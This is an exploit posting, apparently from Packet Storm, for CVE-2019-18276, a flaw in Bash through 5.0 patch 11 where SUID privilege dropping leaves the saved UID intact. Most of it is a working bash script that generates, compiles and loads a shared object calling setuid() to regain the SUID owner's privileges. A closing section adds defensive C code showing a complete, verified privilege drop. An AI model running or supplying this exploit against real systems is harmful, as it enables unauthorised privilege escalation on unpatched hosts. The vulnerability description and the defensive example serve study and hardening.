Bash 5.0 Patch 11 Privilege Escalation

Date: 29 Nov 2019. Reported by Mohin Paramasivam. Type: packetstorm. Source: packetstormsecurity.com

Bash 5.0 Patch 11 Privilege Escalation, SUID Priv Drop Exploit

```bash
#!/bin/bash
# Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit
# Date : 2019-11-29
# Original Author: Ian Pudney , Chet Ramey
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : < Bash 5.0 Patch 11
# Tested on Linux
# Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash
# CVE : 2019-18276
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8
# Exploit Demo POC : https://youtu.be/Dbwvzbb38W0
#
# Description :
#
# An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11.
# By default, if Bash is run with its effective UID not equal to its real UID,
# it will drop privileges by setting its effective UID to its real UID.
# However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality,
# the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for
# runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore
# regains privileges. However, binaries running with an effective UID of 0 are unaffected.

# Terminal color codes
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'

# Get the effective user ID (owner of the SUID /bin/bash binary)
read -p "Please enter effective user id (euid) : " euid

# Create a C file and write the shared-object source into it.
# The heredoc is unquoted on purpose so that $euid is expanded.
touch pwn.c
echo "" > pwn.c

cat <<EOT >> pwn.c

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>

/* Runs when the object is dlopen()ed by "enable -f", before any builtin lookup */
void __attribute__((constructor)) initLibrary(void) {
    printf("Escape lib is initialized\n");
    printf("[LO] uid:%d | euid:%d\n", getuid(), geteuid());
    setuid($euid);
    printf("[LO] uid:%d | euid:%d\n", getuid(), geteuid());
}

EOT

echo -e "${RED}"
echo -e "Exploit Code copied to pwn.c !\n"
sleep 5
echo -e "Compiling Exploit Object ! \n"
$(which gcc ) -c -fPIC pwn.c -o pwn.o
sleep 5
echo -e "Compiling Exploit Shared Object ! \n"
$(which gcc ) -shared -fPIC pwn.o -o libpwn.so
sleep 5
echo -e "Exploit Compiled ! \n"
sleep 5
echo -e "Executing Exploit :) \n"
sleep 5

# Load the shared library as a builtin
echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"
```
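The description explains that the bug is an incomplete privilege drop: only the effective UID is changed and the saved UID keeps the privileged value, so a later setuid() can restore it. The following is an added illustration (not the exploit's code and not Bash's own source) of the check a defender or code reviewer wants: the flawed seteuid()-only pattern beside a complete setresuid()-based drop that is verified with getresuid() instead of trusting return codes. The function names are assumptions chosen for this example.

```c
/* Added example: incomplete vs. complete privilege drop, verified via getresuid(). */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* Prototypes spelled out in case unistd.h was included before _GNU_SOURCE took effect. */
extern int getresuid(uid_t *ruid, uid_t *euid, uid_t *suid);
extern int setresuid(uid_t ruid, uid_t euid, uid_t suid);
extern int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

/* 1 if real, effective AND saved UID all equal `expected`, else 0.
 * A leftover saved UID is exactly what lets a later setuid() regain privilege. */
int privs_fully_dropped(uid_t expected) {
    uid_t r, e, s;
    if (getresuid(&r, &e, &s) != 0)
        return 0;
    return r == expected && e == expected && s == expected;
}

/* The flawed pattern from the description: only the effective UID moves,
 * the saved UID silently keeps the privileged value. */
int drop_privs_incomplete(uid_t real_uid) {
    return seteuid(real_uid);
}

/* Complete drop: all three GIDs first (while still privileged), then all
 * three UIDs, then verify the state rather than trusting the syscalls. */
int drop_privs_complete(uid_t real_uid, gid_t real_gid) {
    if (setresgid(real_gid, real_gid, real_gid) != 0)
        return -1;
    if (setresuid(real_uid, real_uid, real_uid) != 0)
        return -1;
    return privs_fully_dropped(real_uid) ? 0 : -1;
}

/* Run from a binary whose effective UID differs from its real UID to watch
 * the saved UID survive the incomplete drop and vanish after the complete one. */
int main(void) {
    uid_t r, e, s;
    getresuid(&r, &e, &s);
    printf("start     : ruid=%u euid=%u suid=%u\n", (unsigned)r, (unsigned)e, (unsigned)s);
    drop_privs_incomplete(getuid());
    getresuid(&r, &e, &s);
    printf("seteuid   : ruid=%u euid=%u suid=%u dropped=%d\n",
           (unsigned)r, (unsigned)e, (unsigned)s, privs_fully_dropped(getuid()));
    int rc = drop_privs_complete(getuid(), getgid());
    getresuid(&r, &e, &s);
    printf("setresuid : ruid=%u euid=%u suid=%u rc=%d dropped=%d\n",
           (unsigned)r, (unsigned)e, (unsigned)s, rc, privs_fully_dropped(getuid()));
    return rc;
}
```

In an ordinary (non-SUID) process all three UIDs already match, so both paths report a full drop; the difference in the saved UID is only visible when the binary starts with an effective UID that differs from the real one.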
